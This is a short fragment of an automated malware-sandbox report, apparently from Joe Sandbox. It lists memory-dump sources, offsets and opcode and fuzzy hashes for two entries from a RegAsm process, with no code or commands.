                                  • Source File: 00000015.00000002.24198657951.00000000008D2000.00000040.00000001.sdmp, Offset: 008D2000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8d2000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6302ebcb74ebaf2f245cd0fb011fe57d95a5c75be85f0d81e073116a710b8080
                                  • Instruction ID: 5e03961e0f819f20927bed8d6a94d91dd81c333960ab61858df5f4507801e282
                                  • Opcode Fuzzy Hash: 6302ebcb74ebaf2f245cd0fb011fe57d95a5c75be85f0d81e073116a710b8080
                                  • Instruction Fuzzy Hash: B7D05E792056818FE317DE1CC1A5F953BD4BBA1B04F4645FAAC00CB7A3C368D981D204
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000015.00000002.24198657951.00000000008D2000.00000040.00000001.sdmp, Offset: 008D2000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_8d2000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 86a0e360dc1e6174727958d67389e3cb501e1549d2af498fcf40ffaccf09f5a9
                                  • Instruction ID: d16f892a44fb5cf4a018d1517acfe0c7f55d8918533880dd70bb0282dc7c06d6
                                  • Opcode Fuzzy Hash: 86a0e360dc1e6174727958d67389e3cb501e1549d2af498fcf40ffaccf09f5a9
                                  • Instruction Fuzzy Hash: 5BD05E342001814BDB19DE0CC2D4F5937D4BB90B04F0645E9BC00CB372C3B8DD81C600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions